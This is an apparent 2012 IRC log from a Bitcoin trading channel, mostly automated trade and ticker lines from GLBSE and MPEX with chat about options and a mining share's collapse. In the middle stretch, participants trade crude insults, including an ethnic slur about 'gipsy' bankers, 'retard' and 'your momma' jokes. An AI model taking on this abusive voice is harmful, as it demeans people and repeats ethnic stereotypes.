[GIGAMINING] 10 @ 0.941 = 9.41 BTC [-] Aug 19 16:06:03 [GLBSE] [GIGAMINING] 10 @ 0.94 = 9.4 BTC [-] Aug 19 16:06:04 [GLBSE] [GIGAMINING] 1 @ 0.92 BTC [-] Aug 19 16:06:06 [GLBSE] [GIGAMINING] 10 @ 0.9 = 9 BTC [-] Aug 19 16:07:03 [MPEX] [F.GIGA.ETF] 19500 @ 0.00097767 = 19.0646 BTC [+] Aug 19 16:07:04 [MPEX] [F.GIGA.ETF] 11523 @ 0.00096853 = 11.1604 BTC [-] Aug 19 16:07:06 [MPEX] [F.GIGA.ETF] 1200 @ 0.00095463 = 1.1456 BTC [-] Aug 19 16:07:07 [MPEX] [F.GIGA.ETF] 12800 @ 0.0009495 = 12.1536 BTC [-] Aug 19 16:07:08 [MPEX] [F.GIGA.ETF] 7912 @ 0.00092586 = 7.3254 BTC [-] Aug 19 16:07:09 [MPEX] [F.GIGA.ETF] 4007 @ 0.00092111 = 3.6909 BTC [-] Aug 19 16:07:10 [MPEX] [F.GIGA.ETF] 13400 @ 0.00091819 = 12.3037 BTC [-] Aug 19 16:07:10 [MPEX] [F.GIGA.ETF] 8471 @ 0.00091494 = 7.7505 BTC [-] Aug 19 16:07:12 [MPEX] [F.GIGA.ETF] 5301 @ 0.00090127 = 4.7776 BTC [-] Aug 19 16:07:13 [MPEX] [F.GIGA.ETF] 7886 @ 0.00090054 = 7.1017 BTC [-] Aug 19 16:15:19 [MPEX] [O.BTCUSD.P040T] 7 @ 0.01521074 = 0.1065 BTC [-] Aug 19 16:15:19 [MPEX] [O.BTCUSD.P040T] 66 @ 0.00000034 BTC [-] Aug 19 16:15:44 [MPEX] [O.BTCUSD.P140T] 35 @ 0.34073206 = 11.9256 BTC [+] Aug 19 16:16:31 [MPEX] [O.BTCUSD.P150T] 3 @ 0.43671292 = 1.3101 BTC [+] Aug 19 16:16:54 [MPEX] [O.BTCUSD.P080T] 3 @ 0.01147612 = 0.0344 BTC [-] Aug 19 16:17:01 [MPEX] [O.BTCUSD.P160T] 3 @ 0.53269378 = 1.5981 BTC [+] Aug 19 16:17:19 [MPEX] [O.BTCUSD.P070T] 3 @ 0.00022467 = 0.0007 BTC [-] Aug 19 16:17:37 [MPEX] [O.BTCUSD.P180T] 1 @ 0.72465551 BTC [+] Aug 19 16:17:46 [MPEX] [O.BTCUSD.P170T] 1 @ 0.62867465 BTC [+] Aug 19 16:18:03 [MPEX] [O.BTCUSD.P190N] 1 @ 0.82063637 BTC [+] Aug 19 16:19:39 [GLBSE] [TYGRR.BOND-P] 3 @ 0.756 = 2.268 BTC [-] Aug 19 16:19:41 [MPEX] [S.MPOE] 13759 @ 0.00038047 = 5.2349 BTC [+] Aug 19 16:19:42 [MPEX] [S.MPOE] 7100 @ 0.0003855 = 2.7371 BTC [+] Aug 19 16:19:44 [MPEX] [S.MPOE] 13200 @ 0.00038559 = 5.0898 BTC [+] Aug 19 16:19:45 [MPEX] [S.MPOE] 365941 @ 0.0003965 = 145.0956 BTC [+] Aug 19 16:23:02 [GLBSE] [BTC-MINING] 2 @ 0.99991 = 1.9998 BTC [+] Aug 19 16:24:58 [GLBSE] [YABMC] 15 @ 0.1082 = 1.623 BTC [-] Aug 19 16:25:00 [GLBSE] [YABMC] 7 @ 0.107 = 0.749 BTC [-] Aug 19 16:25:01 [GLBSE] [YABMC] 4 @ 0.105 = 0.42 BTC [-] Aug 19 16:25:02 [GLBSE] [YABMC] 1 @ 0.103 BTC [-] Aug 19 16:25:04 [GLBSE] [YABMC] 73 @ 0.101 = 7.373 BTC [-] Aug 19 16:25:11 [GLBSE] [YABMC] 2 @ 0.124 = 0.248 BTC [+] Aug 19 16:25:37 [GLBSE] [YABMC] 12 @ 0.101 = 1.212 BTC [-] Aug 19 16:25:55 [GLBSE] [GIGAMINING] 12 @ 0.9 = 10.8 BTC [-] Aug 19 16:26:12 [GLBSE] [GIGAMINING] 1 @ 0.9 BTC [-] Aug 19 16:31:45 [GLBSE] [GIGAMINING] 33 @ 0.9 = 29.7 BTC [-] Aug 19 16:35:17 [GLBSE] [GIGAMINING] 62 @ 0.9 = 55.8 BTC [-] Aug 19 16:36:30 elementz options expire the current and the next month. the current ones are T Aug 19 16:36:30 and you can buy in 1 btc increments (each option contract is for 1 btc). so depending what you want exactly 5btc will buy you a few. Aug 19 16:36:30 * elementz has quit (Ping timeout: 245 seconds) Aug 19 16:36:30 heh i'm guessing he didnt get that then huh. Aug 19 16:37:34 [MPEX] [O.BTCUSD.C040T] 1 @ 0.71202181 BTC [-] Aug 19 16:37:36 [MPEX] [O.BTCUSD.C040T] 64 @ 0.61870882 = 39.5974 BTC [-] Aug 19 16:38:13 [MPEX] [O.BTCUSD.P040T] 2 @ 0.00014536 = 0.0003 BTC [+] Aug 19 16:38:13 [MPEX] [O.BTCUSD.P040T] 5 @ 0.00000034 BTC [-] Aug 19 16:40:22 [MPEX] [O.BTCUSD.P110N] 2 @ 0.12459087 = 0.2492 BTC [-] Aug 19 16:40:38 [GLBSE] [FUTUREFUND] 4300 @ 0.00011715 = 0.5037 BTC [+] Aug 19 16:41:38 [GLBSE] [TYGRR.BOND-P] 1 @ 0.835 BTC [+] Aug 19 16:41:44 [MPEX] [O.BTCUSD.P180N] 2 @ 0.72631035 = 1.4526 BTC [+] Aug 19 16:42:03 [MPEX] [O.BTCUSD.P160N] 2 @ 0.53416476 = 1.0683 BTC [+] Aug 19 16:42:24 [GLBSE] [ASICMINER] 1 @ 0.1049 BTC [-] Aug 19 16:43:10 [MPEX] [O.BTCUSD.P170N] 3 @ 0.63023755 = 1.8907 BTC [+] Aug 19 16:43:40 [MPEX] [O.BTCUSD.P120N] 4 @ 0.24995151 = 0.9998 BTC [+] Aug 19 16:43:56 [MPEX] [O.BTCUSD.P150N] 5 @ 0.43809196 = 2.1905 BTC [+] Aug 19 16:44:09 [MPEX] [O.BTCUSD.P100N] 15 @ 0.14947786 = 2.2422 BTC [+] Aug 19 16:48:56 [GLBSE] [OBSI.HRPT] 3 @ 0.1 = 0.3 BTC [+] Aug 19 16:53:14 [MPEX] [O.HASH.C10TH] 150000 @ 0.00003126 = 4.689 BTC [-] Aug 19 17:00:35 [GLBSE] [BIB.PIRATE] 1 @ 0.9899 BTC [+] Aug 19 17:02:12 ;;ticker Aug 19 17:02:13 Best bid: 9.3, Best ask: 9.39999, Bid-ask spread: 0.09999, Last trade: 9.4, 24 hour volume: 140154, 24 hour low: 8.831, 24 hour high: 12 Aug 19 17:02:19 ;;bids 9 Aug 19 17:02:19 Error: Failure to retrieve order book data. Try again later. Aug 19 17:06:14 [GLBSE] [OBSI.HRPT] 20 @ 0.1 = 2 BTC [+] Aug 19 17:07:02 [GLBSE] [OBSI.HRPT] 12 @ 0.1 = 1.2 BTC [+] Aug 19 17:12:41 [GLBSE] [MERGEDMINING] 2 @ 0.079 = 0.158 BTC [-] Aug 19 17:12:43 [MPEX] [O.BTCUSD.P090T] 30 @ 0.05024501 = 1.5074 BTC [-] Aug 19 17:12:46 [GLBSE] [FOO.PPPPT] 2 @ 0.62010001 = 1.2402 BTC [+] Aug 19 17:13:27 [GLBSE] [FOO.PPPPT] 3 @ 0.62000001 = 1.86 BTC [-] Aug 19 17:13:30 [GLBSE] [MU] 1 @ 0.497 BTC [+] Aug 19 17:24:11 [GLBSE] [BDK] 5 @ 0.1 = 0.5 BTC [-] Aug 19 17:27:05 [GLBSE] [DMC] 20 @ 0.049 = 0.98 BTC [+] Aug 19 17:27:39 omfg dmc sells ?! Aug 19 17:27:43 [GLBSE] [ASICMINER] 1 @ 0.1049 BTC [-] Aug 19 17:27:48 !ticker DMC Aug 19 17:27:50 [GLBSE:DMC] [Bid: 0.02888] [Ask: 0.049] [Spread: 0.02012] [Last: 0.049] [24hVol: ] [7dAvg: 0.04472505] Aug 19 17:30:25 [GLBSE] [TYGRR.BOND-B] 5 @ 0.1002 = 0.501 BTC [+] Aug 19 17:32:07 [GLBSE] [OBSI.HRPT] 1 @ 0.1 BTC [+] Aug 19 17:32:59 [GLBSE] [OBSI.HRPT] 1 @ 0.1 BTC [+] Aug 19 17:34:39 http://andreiard.ro/wp-content/uploads/2012/06/IMG_4967.jpg Aug 19 17:35:01 [GLBSE] [ARS] 22 @ 0.011 = 0.242 BTC [+] Aug 19 17:38:22 [MPEX] [S.MPOE] 51689 @ 0.0003965 = 20.4947 BTC [+] Aug 19 17:40:47 [GLBSE] [CPA] 40 @ 0.08 = 3.2 BTC [-] Aug 19 17:49:05 [GLBSE] [PUREMINING] 3 @ 0.13889999 = 0.4167 BTC [+] Aug 19 17:50:13 [GLBSE] [OBSI.HRPT] 4 @ 0.1 = 0.4 BTC [+] Aug 19 17:52:15 [GLBSE] [CIUCIU.BOND] 2 @ 0.1 = 0.2 BTC [+] Aug 19 17:52:46 [GLBSE] [ASICMINER] 10 @ 0.105 = 1.05 BTC [+] Aug 19 17:53:27 [GLBSE] [OBSI.HRPT] 300 @ 0.1 = 30 BTC [+] Aug 19 17:53:48 [GLBSE] [OBSI.HRPT] 8 @ 0.1 = 0.8 BTC [+] Aug 19 17:54:46 [GLBSE] [PUREMINING] 25 @ 0.13889999 = 3.4725 BTC [+] Aug 19 17:56:18 [GLBSE] [PUREMINING] 15 @ 0.13899999 = 2.085 BTC [+] Aug 19 17:56:52 [GLBSE] [OBSI.HRPT] 2 @ 0.1 = 0.2 BTC [+] Aug 19 18:03:02 ;;tricker Aug 19 18:03:02 Error: "tricker" is not a valid command. Aug 19 18:03:04 aww Aug 19 18:06:42 [GLBSE] [TYGRR.BOND-P] 4 @ 0.83979 = 3.3592 BTC [+] Aug 19 18:06:44 [GLBSE] [TYGRR.BOND-P] 2 @ 0.83989 = 1.6798 BTC [+] Aug 19 18:06:44 [GLBSE] [TYGRR.BOND-P] 20 @ 0.84 = 16.8 BTC [+] Aug 19 18:06:45 [GLBSE] [TYGRR.BOND-P] 50 @ 0.845 = 42.25 BTC [+] Aug 19 18:06:47 [GLBSE] [TYGRR.BOND-P] 20 @ 0.89999 = 17.9998 BTC [+] Aug 19 18:12:10 [MPEX] [S.MPOE] 16500 @ 0.0003965 = 6.5423 BTC [+] Aug 19 18:20:34 [MPEX] [S.MPOE] 700 @ 0.0003965 = 0.2776 BTC [+] Aug 19 18:20:47 [GLBSE] [DMC] 50 @ 0.055 = 2.75 BTC [+] Aug 19 18:21:30 [GLBSE] [NASTY] 1 @ 0.69 BTC [+] Aug 19 18:21:31 [GLBSE] [NASTY] 5 @ 0.699 = 3.495 BTC [+] Aug 19 18:21:33 [GLBSE] [NASTY] 11 @ 0.7 = 7.7 BTC [+] Aug 19 18:21:34 [GLBSE] [NASTY] 1 @ 0.74 BTC [+] Aug 19 18:21:35 [GLBSE] [NASTY] 9 @ 0.74 = 6.66 BTC [+] Aug 19 18:21:36 [GLBSE] [NASTY] 100 @ 0.75 = 75 BTC [+] Aug 19 18:21:38 [GLBSE] [NASTY] 73 @ 0.8 = 58.4 BTC [+] Aug 19 18:22:03 [GLBSE] [NASTY] 66 @ 0.8 = 52.8 BTC [+] Aug 19 18:22:31 [GLBSE] [NASTY] 13 @ 0.8 = 10.4 BTC [+] Aug 19 18:23:27 [GLBSE] [NYAN.C] 5 @ 0.9859 = 4.9295 BTC [-] Aug 19 18:23:36 [GLBSE] [COGNITIVE] 3 @ 0.6795 = 2.0385 BTC [+] Aug 19 18:23:44 did nasty strike gold ? hehe Aug 19 18:24:04 [GLBSE] [COGNITIVE] 1 @ 0.6795 BTC [+] Aug 19 18:24:48 [GLBSE] [CIUCIU.BOND] 1 @ 0.1 BTC [+] Aug 19 18:25:08 way to go nasty Aug 19 18:26:05 August 11, 2012, 06:17:05 PM A dividend of BTC8.5 has been paid. Aug 19 18:26:17 doesn't seem like much gold. Aug 19 18:30:33 nasty div is up? Aug 19 18:31:16 [GLBSE] [PAJKA.BOND] 2 @ 0.074 = 0.148 BTC [-] Aug 19 18:31:20 actually it was only 6.9 on the 18th Aug 19 18:31:32 had some tech issues getting more stuff online. Aug 19 18:31:38 fuuck, we need to rise 12K EUR to get this going Aug 19 18:32:03 ... Aug 19 18:33:19 project I mentioned before Aug 19 18:34:39 i come from a world where "rise" always prefixes sums of 5 million or more. Aug 19 18:34:45 just charge the 12k ffs. Aug 19 18:35:28 but it was never money for you projects Aug 19 18:37:06 and lets be honest, for start, you do not live in EU's "advanced" area so your "world" reference is a fkn joke Aug 19 18:37:53 i guess your silly stereotypes are the reason you have to "raise" 12k to piss away on some side project you'll get bored with in a week. Aug 19 18:38:23 lol raise 12k? :S Aug 19 18:38:29 Withdraw it from the bank Aug 19 18:38:48 lol, fkn gipsy bankers and other piss poor wankers Aug 19 18:38:51 nevertheless, there exist people who, should they wish to spend half a mass market car's worth on something, just go ahead and do it. Aug 19 18:39:43 EskimoBob: Umm, what are you talking about? Aug 19 18:40:08 Luceo flavour of the week is gypsy. i think last week it was greek. Aug 19 18:40:11 he has issues. Aug 19 18:40:24 Oh OK :P Aug 19 18:40:40 So what's this project he needs to raise 12k for? :P Aug 19 18:40:47 Deez Litecoiners :P Aug 19 18:40:51 new toaster oven. Aug 19 18:40:57 no, looks like you have issues :) **** BEGIN LOGGING AT Sun Aug 19 18:43:59 2012 Aug 19 18:44:38 Luceo: what ever this imaginary money you use in your moms basement to buy "exotic pets" ... Aug 19 18:44:53 My mom doesn't have a basement, sorry. Try again. Aug 19 18:45:23 sorry, so you have to play in a cardboard box... too fkn bad Aug 19 18:45:46 Yes, because I'm the one struggling to 'raise' $12,000? Aug 19 18:46:29 so what is it for you? You like to participate or just jerk off here? Aug 19 18:47:02 EskimoBob wait. didn't your online persona include some floor trading ? weren't you some retired financier ? Aug 19 18:48:11 and how is this even related to what ever you two asshats are so worked up about? Aug 19 18:48:17 [GLBSE] [GIGAMINING] 3 @ 1.03939 = 3.1182 BTC [+] Aug 19 18:48:42 so basically your theory here is that you're an ex banker with typically white trash mental representations. Aug 19 18:48:59 tis very amusing indeed. Aug 19 18:49:01 evening :) Aug 19 18:49:05 hi. Aug 19 18:49:08 what are you smoking mircea_popescu ? Aug 19 18:49:09 what's going on? :P Aug 19 18:49:14 oh surprise surprise, people being pleasant on the internet Aug 19 18:49:28 DeaDTerra just having a little fun at the expense of the wannabes. Aug 19 18:49:35 okay :P Aug 19 18:49:39 like yourself? Aug 19 18:49:45 burned? xD Aug 19 18:49:46 man, get a life Aug 19 18:50:00 [GLBSE] [PUREMINING] 2 @ 0.13889999 = 0.2778 BTC [-] Aug 19 18:50:02 Anyone want to sell pirate assets? Aug 19 18:50:13 Sorry, I couldn't stop laughing at the idea of a banker talking about raising 12k eur ^^ Aug 19 18:50:23 I know bankers who spend more than that at dinner... Aug 19 18:50:26 mircea_popescu: you are always yapping even if you have nothing of value to add Aug 19 18:50:29 Luceo i guess we're not supposed to remember things from the day before. Aug 19 18:50:42 Luceo: who told you I am a banker? Aug 19 18:50:53 EskimoBob do you feel the need for a log quote ? Aug 19 18:51:09 EskimoBob: I know it's fast conversation in here sir, but try to keep up Aug 19 18:51:16 [GLBSE] [PUREMINING] 10 @ 0.13899999 = 1.39 BTC [+] Aug 19 18:51:17 mircea_popescu: is pulling crap out of his ass and is delusional enough to believe it's all true Aug 19 18:51:20 Sarcasm, btw, it's not Aug 19 18:52:14 so what is exactly your problem? Aug 19 18:52:35 forget I asked. I do not care Aug 19 18:54:47 ircea_popescu is a failed porn peddler. No wonder he has issues. What is your excuse Luceo? Aug 19 18:54:58 mkay, since you insist. Aug 19 18:55:00 oops... I do not care :) Aug 19 18:55:40 My excuse for what? Aug 19 18:56:08 You're a particularly unpleasant and unknowledgeable person at the best of times, and apparently a discriminatory racist as well... Aug 19 18:57:54 Luceo: acting like a total idiot for start Aug 19 18:57:59 Yea Eskimbob and Mircea have been sitting and fightin in this channel for the last couple of days xD Aug 19 19:01:18 [MPEX] [O.BTCUSD.C040N] 1 @ 0.75714749 BTC [-] Aug 19 19:03:18 you're momma's so fat Aug 19 19:03:56 Aug 17 19:29:09 I used to work in finance for long time. Got bored and left. Never looked back Aug 19 19:03:56 Aug 17 19:29:16 what a waste of life it is. Aug 19 19:03:58 [GLBSE] [TYGRR.BOND-P] 4 @ 0.7611 = 3.0444 BTC [-] Aug 19 19:04:00 so then. Aug 19 19:04:04 did you or didn;t you ? Aug 19 19:04:09 so? Aug 19 19:04:21 so isn't in the set {yes, no} Aug 19 19:04:24 she doesn't need the internet, she's already world wide Aug 19 19:05:02 but either way, if you worked in finance for a long time and left w/o 12k to your name you're even funnier than i had originally hoped for :D Aug 19 19:05:13 i am not sure what are you attempting to achieve mircea_popescu Aug 19 19:05:38 aww, Aug 19 19:06:05 EskimoBob's momma so poor she bounces food stamps Aug 19 19:06:10 you are even more clueless that I imagined. pople rise money for all sorts of shit no matter what thy have on their personal bank account Aug 19 19:06:25 how fkn stupid are you? Aug 19 19:06:33 o, "people" do ? im sorry eskimodog, but we of teh internets know you're a dog. Aug 19 19:06:34 what nao ? Aug 19 19:06:39 Not 12k Aug 19 19:06:51 i am going grocery shopping bye all Aug 19 19:06:57 gonna stop by glbse first and ipo my list. Aug 19 19:07:03 should raise about $85. Aug 19 19:07:07 Nobody with a serious bank account allows other people to buy into a 12k venture, why would they? Aug 19 19:07:24 [MPEX] [F.GIGA.ETF] 900 @ 0.00092602 = 0.8334 BTC [+] Aug 19 19:07:49 Luceo relax and take your medicine. Aug 19 19:08:03 you are as useless as any other troll Aug 19 19:08:23 Truth = trolling? lol Aug 19 19:08:49 [GLBSE] [BBBB] 5 @ 0.00028 = 0.0014 BTC [+] Aug 19 19:08:52 If you've left a finance job and cant afford to throw 12k at something, I'd suggest nobody should want to throw 12k at you :P Aug 19 19:08:57 for start, you have no idea wtf I am talking about. You got all worked up over nothing and now you are just trolling Aug 19 19:09:12 what happened? did your mama hurt you? Aug 19 19:09:26 Luceo's momma so stupid she peels m&ms to make chocolate chip cookies Aug 19 19:09:28 hahaha Aug 19 19:09:36 probably Aug 19 19:09:43 [GLBSE] [BBBB] 1 @ 0.00028 BTC [+] Aug 19 19:10:17 Luceo go write some big numbers on a paper and imagine it's all yours. Will make you feel all rich and powerful .. LOL fkn retard Aug 19 19:10:18 so eskimo bobbie, theoretical problem : you need 12 k for your wonder project which is 100% guaranteed to succeed. There's three investors that would give you money : a greek, a gypsy and a pornographer. Aug 19 19:10:20 what do you do ? Aug 19 19:10:38 interesting idea Aug 19 19:11:15 [GLBSE] [BTCMC] 1 @ 0.58021 BTC [-] Aug 19 19:11:17 [GLBSE] [BTCMC] 1 @ 0.5802 BTC [-] Aug 19 19:11:18 [GLBSE] [BTCMC] 4 @ 0.5800209 = 2.3201 BTC [-] Aug 19 19:11:19 [GLBSE] [BTCMC] 1 @ 0.580001 BTC [-] Aug 19 19:11:21 but look like I am dealing with one asshole, who has split personality problems Aug 19 19:11:34 mircea_popescu's momma so ugly she makes blind kids cry Aug 19 19:11:35 is that you mircea_popescu? Aug 19 19:11:44 EskimoBob: If I want to stare at a big number I'll just divide 1 by your IQ Aug 19 19:11:49 [GLBSE] [BTCMC] 3 @ 0.55 = 1.65 BTC [-] Aug 19 19:11:51 [GLBSE] [BTCMC] 1 @ 0.6 BTC [+] Aug 19 19:11:56 pigeons that'd be the retractor making them cry :D Aug 19 19:12:14 ;;calc 1 / 0.0000000000000000000235992 Aug 19 19:12:14 Error: float division Aug 19 19:12:16 Luceo: that was deep. Where did you see that before? Aug 19 19:12:19 :( Aug 19 19:12:19 for the record : i did once run a "cuss the other person out" contest on my blog Aug 19 19:12:24 i got like 7-800 comments Aug 19 19:12:46 lol.. you are a joker Aug 19 19:12:54 Luceo is a businessman Aug 19 19:13:07 nuh-uh http://www.google.com/search?q=injurat+blogari&complete=0 Aug 19 19:13:10 even google knows about it. Aug 19 19:13:10 [MPEX] [S.MPOE] 41656 @ 0.00039181 = 16.3212 BTC [+] Aug 19 19:13:13 Luceo: is a asshole and a shit bag Aug 19 19:13:15 Hi usagi Aug 19 19:13:27 [MPEX] [S.MPOE] 61076 @ 0.0003965 = 24.2166 BTC [+] Aug 19 19:13:28 poor but fat shit bag Aug 19 19:13:38 at least he acts like one Aug 19 19:13:41 EskimoBob, please learn some useful insults, I'm not in middle school any more Aug 19 19:13:44 [MPEX] [S.MPOE] 7531 @ 0.00039181 = 2.9507 BTC [-] Aug 19 19:13:45 [MPEX] [S.MPOE] 36969 @ 0.00038355 = 14.1795 BTC [-] Aug 19 19:14:01 If EskimoBob was any stupider we'd have to call him by a latin name and water him thrice a day Aug 19 19:14:04 usagi's momma so old she has an authographed bible Aug 19 19:14:09 so, go and fuck yourself if you can find your dick :) Aug 19 19:14:48 Soon. Aug 19 19:14:56 Not now... but soon. Aug 19 19:14:59 I guess anatomy isn't your strong subject either. Aug 19 19:14:59 This world will change Aug 19 19:15:18 this convo is very funny mostly cause it consists of people trying to cuss each other interspersed with my stock trading Aug 19 19:15:20 usagi: Bitcoin is the change the world needs! Aug 19 19:15:27 i kinda feel like i own the world. Aug 19 19:15:29 what ever Luceo, can you shut up for now? Aug 19 19:15:39 [GLBSE] [GIGAMINING] 3 @ 1.0395 = 3.1185 BTC [+] Aug 19 19:15:55 EskimoBob: Just for now? Want me to give you long enough to come up with a retort that isn't as impotent as you are? Aug 19 19:15:56 ;;ticker Aug 19 19:15:56 Best bid: 9.1575, Best ask: 9.2, Bid-ask spread: 0.04250, Last trade: 9.20498, 24 hour volume: 137925, 24 hour low: 8.831, 24 hour high: 12 Aug 19 19:16:29 mircea_popescu: I'm doing what I hate most, waiting for other people. :( Aug 19 19:17:01 Luceo by now i'm indifferent to it. online conference calls changed the world. Aug 19 19:17:35 I mean waiting for them to do something, not waiting for them to say something :P Aug 19 19:17:47 now that is suck. Aug 19 19:18:02 [GLBSE] [GIGAMINING] 15 @ 1.0396 = 15.594 BTC [+] Aug 19 19:18:45 Someone should open an exchange with reasonable fees :/ Aug 19 19:19:02 [MPEX] [B.MPCD.B] 25000 @ 0.001008 = 25.2 BTC [+] Aug 19 19:19:10 [GLBSE] [ASICMINER] 110 @ 0.105 = 11.55 BTC [+] Aug 19 19:19:18 Luceo you mean btc/usd ? Aug 19 19:19:28 That or BTC/EUR Aug 19 19:19:59 1% round trip is a little excessive. Aug 19 19:20:12 1% is cheap Aug 19 19:20:27 It's not, it's essentially forex :S Aug 19 19:20:30 yeah. Aug 19 19:20:32 Margins on bullion are almost always over 3% either way Aug 19 19:20:38 bullion ?! Aug 19 19:20:44 how's that a standard Aug 19 19:20:54 Bitcoin has storage costs because you need to secure them. Aug 19 19:21:05 not comparable to bullion. Aug 19 19:21:09 [GLBSE] [BITBOND] 2 @ 0.33 = 0.66 BTC [-] Aug 19 19:21:10 [GLBSE] [BITBOND] 4 @ 0.3399 = 1.3596 BTC [+] Aug 19 19:21:38 Most bullion trading is paper only, gold is ridiculously oversold Aug 19 19:21:40 People can read your keyboard with an am/fm radio sitting outside your house Aug 19 19:21:55 Don't use a wireless keyboard :P Aug 19 19:22:02 i don't use a wireless anything. Aug 19 19:22:07 I am not talking wireless. Aug 19 19:22:13 then you're not talking sense. Aug 19 19:22:19 [GLBSE] [BITBOND] 1 @ 0.33 BTC [-] Aug 19 19:22:20 I use a PS/2 keyboard Aug 19 19:22:24 There's nothing to read Aug 19 19:22:31 *shrug* this is why ppl pay pros for security Aug 19 19:22:43 Most people have no idea how to secure a computer system Aug 19 19:22:50 yeah. nevertheless, some do. Aug 19 19:22:56 actually, some might even be in this chatroom. Aug 19 19:22:57 [GLBSE] [DMC] 100 @ 0.053 = 5.3 BTC [-] Aug 19 19:23:06 I used to get paid to secure computer systems ^^ Aug 19 19:23:09 For example? Aug 19 19:23:21 First thing you do is throw out everything wireless & bluetooth Aug 19 19:23:23 [MPEX] [S.MPOE] 7172 @ 0.00038355 = 2.7508 BTC [-] Aug 19 19:23:41 Unless it's working on an encrypted signal (and not WEP, that's absolutely pointless) Aug 19 19:23:47 [GLBSE] [DMC] 10 @ 0.053 = 0.53 BTC [-] Aug 19 19:23:55 smickles mind pointing out to the nitwit http://www.reddit.com/r/Bitcoin/comments/ycgm8/freeforall_pentesting_on_mpex/ that a. it's not a reward b. the bitdaytrade dood offered nothing at all. Aug 19 19:27:51 smickles mama's so bald you can literally see what's on her mind Aug 19 19:28:34 [GLBSE] [OBSI.HRPT] 2 @ 0.1 = 0.2 BTC [+] Aug 19 19:29:36 pigeons http://www.shuonline.co.uk/news/march2009/hawkattacks032009ii.jpg Aug 19 19:29:55 :( Aug 19 19:30:09 awww! Aug 19 19:30:22 ouch... =( Aug 19 19:30:53 back Aug 19 19:30:54 i guess i win. Aug 19 19:30:55 ;;ticker Aug 19 19:30:55 Best bid: 9.21999, Best ask: 9.22, Bid-ask spread: 0.00001, Last trade: 9.22, 24 hour volume: 137765, 24 hour low: 8.831, 24 hour high: 12 Aug 19 19:30:57 o. Aug 19 19:31:03 kakobrekla when do we have the !ticker for mpex ? Aug 19 19:31:12 how about today Aug 19 19:31:15 :D Aug 19 19:31:24 there's no day quite like today. Aug 19 19:31:29 indeed Aug 19 19:31:44 [MPEX] [O.BTCUSD.C200N] 3 @ 0.08916293 = 0.2675 BTC [-] Aug 19 19:31:49 {"S.MPOE": {"1d": {"avg": "38482.9599125","min": "36299","max": "39650","volsh": "2047646","volsa": "78799478933","cnt": "103"}, Aug 19 19:31:56 is it cleaer what they all stand for ? Aug 19 19:32:14 whats the url again Aug 19 19:32:19 http://polimedia.us/bitcoin/mpex-vwap.php Aug 19 19:32:22 ill ping you when i get to it Aug 19 19:32:28 if theres any questions Aug 19 19:32:32 works. Aug 19 19:36:57 what? http://polimedia.us/dtng/f/ ? Aug 19 19:38:21 wtf Aug 19 19:38:58 ladies. Aug 19 19:39:01 mmmm. Aug 19 19:39:07 i prefer http://polimedia.us/dtng/c/ personally. Aug 19 19:43:25 [GLBSE] [ASICMINER] 15 @ 0.1027 = 1.5405 BTC [-] Aug 19 19:43:27 [GLBSE] [ASICMINER] 2 @ 0.1026 = 0.2052 BTC [-] Aug 19 19:43:27 [GLBSE] [ASICMINER] 40 @ 0.1025 = 4.1 BTC [-] Aug 19 19:47:18 [GLBSE] [ASICMINER] 10 @ 0.1049 = 1.049 BTC [+] Aug 19 19:52:20 [GLBSE] [TYGRR.BOND-P] 4 @ 0.9099 = 3.6396 BTC [+] Aug 19 19:52:22 [GLBSE] [TYGRR.BOND-P] 5 @ 0.91 = 4.55 BTC [+] Aug 19 19:52:23 [GLBSE] [TYGRR.BOND-P] 1 @ 0.9298 BTC [+] Aug 19 19:55:16 lol Aug 19 19:55:28 didnt they selll tygrr bond p for 0.7 yesterday Aug 19 19:55:51 .69 even Aug 19 19:56:36 i sold mine yesterday for 0.97 Aug 19 19:56:36 [GLBSE] [DMC] 18 @ 0.052 = 0.936 BTC [-] Aug 19 19:56:37 [GLBSE] [DMC] 16 @ 0.053 = 0.848 BTC [+] Aug 19 19:56:39 :P Aug 19 19:56:39 [GLBSE] [DMC] 4 @ 0.054 = 0.216 BTC [+] Aug 19 19:56:47 wowow dmc has dropped Aug 19 19:56:52 wasnt it 1 btc at start Aug 19 19:56:56 [GLBSE] [DMC] 1 @ 0.054 BTC [+] Aug 19 20:03:16 [GLBSE] [DMC] 5 @ 0.054 = 0.27 BTC [+] Aug 19 20:03:40 Anduck yeah. Aug 19 20:06:34 [GLBSE] [BTCMC] 6 @ 0.3899 = 2.3394 BTC [-] Aug 19 20:07:00 [MPEX] [S.MPOE] 11000 @ 0.00038366 = 4.2203 BTC [+] Aug 19 20:07:14 DMC was 0.02 the other day Aug 19 20:08:14 thats what you get when you print it like paper Aug 19 20:09:34 i still aren't entirely clear on the thing. Aug 19 20:09:42 guy announces 1mn btc mining company, 1mn shares. Aug 19 20:09:46 then sells like 20 k ? Aug 19 20:09:59 and then... somehow... they are counted as all issued ? Aug 19 20:10:12 so the 20k is now divided to 1mn shares, hence 0.02 per share ? Aug 19 20:10:45 no Aug 19 20:10:46 and then out of the 20k btc all he has are assets worth ~1k or so ? Aug 19 20:11:16 guy announces 1mn shares mega mining corp Aug 19 20:11:19 launches Aug 19 20:11:21 fails Aug 19 20:11:28 scrapes for what he can get Aug 19 20:11:39 succeeds in diluting what he gets Aug 19 20:11:41 so he's been diluting ?! Aug 19 20:11:42 o wow. Aug 19 20:11:45 profit? Aug 19 20:11:46 is that even allowed ? Aug 19 20:12:00 I can't really talk about that Aug 19 20:12:10 outrageous. Aug 19 20:12:13 as it's quite complicated Aug 19 20:12:14 and Aug 19 20:12:20 sensitive Aug 19 20:12:22 also Aug 19 20:12:26 thats my impression Aug 19 20:12:34 I don't have the actual details at hand Aug 19 20:12:34 dilution is like... the cardinal sin i think. Aug 19 20:12:55 I must have used the wrong word Aug 19 20:12:58 All issued? what? Aug 19 20:13:03 I should have used devaluing Aug 19 20:13:07 but it's late Aug 19 20:13:11 and I'm quite tired and burned out Aug 19 20:13:16 so please do forgive Aug 19 20:13:25 no big deal Aug 19 20:13:27 There's 20k outsrandnig Aug 19 20:13:45 usagi so if the float is 20k and he got 20k in btc, why is it under so much sell pressure ? Aug 19 20:13:52 I don't know what he's told you but I'm the one who has been working with Diablo to arrange most of the trades Aug 19 20:13:59 Although recently I am no longer the majority shareholder Aug 19 20:14:16 i said i don't understand it from the get-go, it's what i mean. i m not clear what went down there. Aug 19 20:14:30 it's not really sensitive information, it just how the market is valuing mining right now Aug 19 20:15:08 he doesn't have 20k in BTC Aug 19 20:15:22 so he sold some of the 20k for 1btc and some for less ? Aug 19 20:15:23 [GLBSE] [BDK.BND] 100 @ 0.10275 = 10.275 BTC [+] Aug 19 20:15:25 or what was ipo price ? Aug 19 20:15:26 Look 